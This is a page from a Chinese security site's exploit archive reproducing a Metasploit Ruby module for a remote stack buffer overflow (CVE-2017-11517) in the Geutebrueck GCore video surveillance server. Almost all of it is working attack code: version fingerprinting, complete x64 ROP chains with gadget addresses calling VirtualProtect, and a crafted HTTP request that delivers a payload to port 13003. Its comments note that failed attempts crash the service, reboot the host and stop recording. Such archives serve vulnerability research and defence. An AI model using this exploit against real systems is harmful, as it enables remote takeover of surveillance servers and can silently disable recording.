首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Geutebrueck GCore GCoreServer.exe Buffer Overflow
来源:metasploit.com 作者:Cappiello 发布时间:2017-11-09  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'nokogiri'
require 'open-uri'

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  Rank = NormalRanking

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE',
      'Description'	=> %q{
        This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe).
        The vulnerable webserver is running on Port 13003 and Port 13004, does not require
        authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).
      },
      'License' => MSF_LICENSE,
      'Author' =>
      [
        'Luca Cappiello',
        'Maurice Popp'
      ],
      'References' =>
      [
        ['EDB','41153'],
        ['CVE', '2017-11517'],
        ['URL','www.geutebrueck.com']
      ],
      'Platform' => 'win',
      'Targets' =>
      [
        ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }],
        ['GCore 1.3.8.42, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}],
        ['GCore 1.4.2.37, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}]
      ],
      'Payload' =>
      {
        'Space' => '2000'
      },
      'Privileged' => true,
      'DisclosureDate' => 'Jan 24 2017',
      'DefaultTarget' => 0))

      register_options(
        [Opt::RPORT(13003)]
      )
    end

    def fingerprint
      print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")
      @doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"))
      statistics = @doc.css('modulestate')
      statistics.each do |x|
        if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42')
          mytarget = targets[1]
          print_status("Vulnerable version detected: #{mytarget.name}")
          return Exploit::CheckCode::Appears, mytarget
        elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37')
          mytarget = targets[2]
          print_status("Vulnerable version detected: #{mytarget.name}")
          return Exploit::CheckCode::Appears, mytarget
        end
      end
      print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")
      print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.')
      print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!')
      print_status('After a crash, the videosurveillance system can not recover properly and stops recording.')
      [Exploit::CheckCode::Unknown, nil]
    end

    def check
      fingerprint
    end

    def ropchain(target)
      rop = ''
      # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap.
      stack_align = "\x43" * 16

      if target.name.include? '1.3.8.42'
        print_status('Preparing ROP chain for target 1.3.8.42!')

        # 0x140cd00a9 | add rsp, 0x10 ; ret
        # This is needed because the next 16 bytes are sometimes messed up.
        overwrite = [0x140cd00a9].pack('Q<')

        # We have 40 bytes left to align our stack!
        # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
        # and to restore it.
        # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.

        # 0x1404e5cbf: mov edx, esp ; ret
        stack_align << [0x1404e5cbf].pack('Q<')

        # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.
        # We pop -XXXXX as \xxxxxxxxx to rax
        # 0x14013db94  pop rax ; ret
        stack_align << [0x14013db94].pack('Q<')
        stack_align << [0xFFFFFFFFFFFFF061].pack('Q<')

        # Our value is enough.
        # 0x1407dc547  | add rax,rdx ; ret
        stack_align << [0x1407dc547].pack('Q<')

        # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
        # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret
        stack_align << [0x140ce9ac0].pack('Q<')

        # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
        # We want RCX to hold the value for VP Argument "Address of Shellcode"
        # 0x140cc2234 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
        rop << [0x140cc2234].pack('Q<')
        rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
        # 0x1400ae2ae    | POP RDX; RETN
        # 0x...1000      | Value for VP "Size of Memory"
        rop << [0x1400ae2ae].pack('Q<')
        rop << [0x0000000000000400].pack('Q<')

        # 0x14029dc6e:   | POP R8; RET
        # 0x...40        | Value for VP "Execute Permissions"
        rop << [0x14029dc6e].pack('Q<')
        rop << [0x0000000000000040].pack('Q<')

        # 0x1400aa030    | POP R9; RET
        # 0x1409AE1A8 is the .data section of gcore
        rop << [0x1400aa030].pack('Q<')
        rop << [0x1409AE1A8].pack('Q<')

        # 0x140b5927a: xor rax, rax ; ret
        rop << [0x140b5927a].pack('Q<')

        # 0x1402ce220 pop rax ; ret
        # 0x140d752b8 | VP Stub IAT Entry
        rop << [0x1402ce220].pack('Q<')
        rop << [0x140d752b8].pack('Q<')

        # 0x1407c6b3b mov rax, qword [rax] ; ret  ;
        rop << [0x1407c6b3b].pack('Q<')

        # 0x140989c41 push rax; ret
        rop << [0x140989c41].pack('Q<')

        # 0x1406d684d jmp rsp
        rop << [0x1406d684d].pack('Q<')

        [rop, overwrite, stack_align]

      elsif target.name.include? '1.4.2.37'
        print_status('Preparing ROP chain for target 1.4.2.37!')

        # 0x140cd9759 | add rsp, 0x10 ; ret
        # This is needed because the next 16 bytes are sometimes messed up.
        overwrite = [0x140cd9759].pack('Q<')

        # We have 40 bytes left to align our stack!
        # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
        # and to restore it.
        # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.

        # 0x1404f213f: mov edx, esp ; ret
        stack_align << [0x1404f213f].pack('Q<')

        # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.
        # We pop -XXXXX as \xxxxxxxxx to rax
        # 0x14000efa8  pop rax ; ret
        stack_align << [0x14000efa8].pack('Q<')
        stack_align << [0xFFFFFFFFFFFFF061].pack('Q<')

        # Our value is enough.
        # 0x140cdfe65  | add rax,rdx ; ret
        stack_align << [0x140cdfe65].pack('Q<')

        # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
        # 0x140cf3110 | mov rsp, rax ; ..... ; ret
        stack_align << [0x140cf3110].pack('Q<')

        # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
        # We want RCX to hold the value for VP Argument "Address of Shellcode"
        # 0x140ccb984 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
        rop << [0x140ccb984].pack('Q<')
        rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
        # 0x14008f7ec      | POP RDX; RETN
        # 0x...1000        | Value for VP "Size of Memory"
        rop << [0x14008f7ec].pack('Q<')
        rop << [0x0000000000000400].pack('Q<')

        # 0x140a88f81:   | POP R8; RET
        # 0x...40        | Value for VP "Execute Permissions"
        rop << [0x140a88f81].pack('Q<')
        rop << [0x0000000000000040].pack('Q<')

        # 0x1400aa030    | POP R9; RET
        # 0x...          | Value for VP "Writeable location". Not sure if needed?
        # 0x140FB5000 is the .data section of gcore; let's test with this writable section...
        rop << [0x1400aa030].pack('Q<')
        rop << [0x140FB5000].pack('Q<')

        # 0x140ccea2f: xor rax, rax ; et
        rop << [0x140ccea2f].pack('Q<')

        # 0x14000efa8 pop rax ; ret
        # 0x140d83268 | VP Stub IAT Entry
        rop << [0x14000efa8].pack('Q<')
        rop << [0x140d83268].pack('Q<')

        # 0x14095b254 mov rax, qword [rax] ; ret  ;
        rop << [0x14095b254].pack('Q<')

        # 0x140166c46 push rax; ret
        rop << [0x140166c46].pack('Q<')

        # 0x140cfb98d jmp rsp
        rop << [0x140cfb98d].pack('Q<')

        [rop, overwrite, stack_align]

      else
        print_status('ROP chain for this version not (yet) available or the target is not vulnerable.')
      end
    end

    def exploit
      if target['auto']
        checkcode, target = fingerprint
        fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown'
        target_rop, target_overwrite, target_stack_align = ropchain(target)
      else
        print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.')
        print_status("Selected version: #{self.target.name}")
        target_rop, target_overwrite, target_stack_align = ropchain(self.target)
      end

      begin
        connect
        print_status('Crafting Exploit...')
        exploit = 'GET /'
        exploit << "\x41" * 200
        exploit << target_rop
        exploit << payload.encoded
        exploit << "\x41" * 1823
        exploit << target_overwrite
        exploit << target_stack_align

        print_status('Exploit ready for sending...')
        sock.put(exploit, 'Timeout' => 20)
        print_status('Exploit sent!')
        buf = sock.get_once || ''
      rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}\n#{e.fail_with}")
      ensure
        print_status('Closing socket.')
        disconnect
      end
    end
  end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Mako Server 2.5 Command Inject
·Microsoft Internet Explorer 11
·Microsoft Windows LNK File Cod
·IBM Lotus Notes Denial Of Serv
·FreeFloat FTP Server 1.0 HOST
·CoolPlayer+ Portable 2.19.6 St
·Linux Kernel 4.13 (Ubuntu 17.1
·SMPlayer 17.11.0 - '.m3u' Buff
·Debut Embedded httpd 1.20 - De
·Ipswitch WS_FTP Professional <
·Avaya IP Office (IPO) 10.1 Sof
·Avaya IP Office (IPO) 10.1 Act
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved